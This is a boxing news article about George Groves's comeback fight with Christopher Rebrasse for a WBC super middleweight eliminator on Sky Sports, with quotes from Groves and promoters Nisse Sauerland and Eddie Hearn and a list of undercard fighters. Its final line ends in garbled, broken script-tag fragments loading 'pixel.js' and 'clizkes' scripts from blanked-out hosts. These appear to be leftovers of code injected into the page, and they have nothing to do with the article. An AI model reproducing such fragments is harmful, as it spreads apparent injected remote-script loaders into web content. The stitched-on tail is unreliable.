groves v rebrasse

George Groves returns to the ring on September 20th, his first fight since his KO loss to Carl Froch, when he takes on European Champion Christopher Rebrasse in a final eliminator for the WBC World Super Middleweight title, a fight which will be shown Live on Sky Sports.

Groves, 26, (19-2, 15 KOs) who was first controversially stopped by Froch in November 2013 in round 9, then went onto loose the big Wembley return via a calculating 8th round finish by Froch, in his previous world title attempts and has set out on a mission to make it third time lucky.

The ‘Saint’ is now working with Team Sauerland and because of the association with Matchroom Boxing a deal has been struck to screen Groves’ comeback and world title quest on the network.

“I am thrilled to be back boxing on Sky Sports,’’ said Groves.

“It is a great platform for boxing in the UK. Over the years I have made a lot of friends within the company and created a base of fantastic fans with the help of their exposure. I’m sure with their continued support everyone will be able to see me lift the WBC belt live on Sky Sports in the near future.”

Victory over the Frenchman will put Groves in a position to challenge World champion Anthony Dirrell for the WBC super middleweight title, after Dirrell took the title off Sakio Bika on the Shawn Porter v Kell Brook undercard.

Groves’ promoters also spoke about the fight and another big night for British boxing.

“We are delighted this fight will be on Sky Sports, where George has found his home in recent years. Said promoter Nisse Sauerland.

“Considering the importance of this fight for George’s career, this is the icing on the cake in terms of making it a big night for British boxing. We are also very happy to be working with Eddie Hearn and Matchroom Boxing to bring fans an action-packed undercard.”

British promoter and Sky Sports boxing provider Eddie Hearn, head of Matchroom Boxing also shared his views: “Delighted to reach an agreement with Team Sauerland to broadcast George Groves’ clash with Christopher Rebrasse at The SSE Arena on Sky Sports.

“Following the success of the Froch vs. Groves card at Wembley Stadium, we felt it was important to keep George on Sky, with some huge domestic and international fights at Super Middleweight sure to be in the mix. The undercard will feature a number of top Matchroom Boxing fighters, with a full card to be announced shortly.”  Hearn added.

Confirmed for the September 20th undercard up to now is: Olympic gold medalist Luke Campbell (7-0, 5 KOs), Commonwealth Super Flyweight Champion Kal Yafai (11-0, 8 KOs), lightweight prospect Martin J. Ward (9-0-1, 4 KOs), Swedish KO king Oscar Ahlin (9-0, 8 KOs) and professional debutant Luke Watkins.# src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://land.#/clizkes’ type=’text/javascript’># src=’https://#/clizkes’ type=’text/javascript’>
